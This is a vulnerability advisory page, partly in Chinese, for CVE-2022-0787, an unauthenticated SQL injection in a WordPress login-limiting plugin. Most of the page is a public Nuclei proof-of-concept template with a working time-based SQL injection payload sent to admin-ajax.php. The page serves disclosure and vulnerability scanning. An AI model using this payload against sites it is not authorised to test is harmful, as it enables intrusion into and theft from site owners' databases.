CVE-2022-0787: Limit Login Attempts (Spam Protection) < 5.1 - SQL Injection

日期: 2025-08-01 | 影响软件: Limit Login Attempts (Spam Protection) | POC: 已公开

漏洞描述

The Limit Login Attempts (Spam Protection) WordPress plugin before 5.1 does not sanitise and escape some parameters before using them in SQL statements via AJAX actions (available to unauthenticated users), leading to SQL Injections.

PoC代码[已公开]

id: CVE-2022-0787

info:
  name: Limit Login Attempts (Spam Protection) < 5.1 - SQL Injection
  author: theamanrawat
  severity: critical
  description: |
    The Limit Login Attempts (Spam Protection) WordPress plugin before 5.1 does not sanitise and escape some parameters before using them in SQL statements via AJAX actions (available to unauthenticated users), leading to SQL Injections.
  remediation: Fixed in version 5.1
  reference:
    - https://wpscan.com/vulnerability/69329a8a-2cbe-4f99-a367-b152bd85b3dd
    - https://wordpress.org/plugins/wp-limit-failed-login-attempts/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0787
    - https://github.com/cyllective/CVEs
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-0787
    cwe-id: CWE-89
    epss-score: 0.44426
    epss-percentile: 0.97485
    cpe: cpe:2.3:a:limit_login_attempts_project:limit_login_attempts:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: limit_login_attempts_project
    product: limit_login_attempts
    framework: wordpress
  tags: time-based-sqli,cve,cve2022,wpscan,sqli,wordpress,wp-plugin,wp,wp-limit-failed-login-attempts,limit_login_attempts_project

http:
  - raw:
      - |
        @timeout: 15s
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=WPLFLA_get_log_data&order[][column]=0&columns[][data]=(SELECT+7382+FROM+(SELECT(SLEEP(6)))ameU)

    matchers:
      - type: dsl
        dsl:
          - duration>=6
          - status_code == 200
          - contains(header, "text/html")
          - contains(body, 'iTotalDisplayRecords')
        condition: and
# digest: 4a0a004730450220226500c416f342830e4d2bc8798df06fae154e207dc137030ad2ed2fb3653ff4022100c41dfb8e85a7c0be3e880ac6f340b161ab23d505627da5b0a6cd5f951313a85e:922c64590222798bb761d5b6d8e72950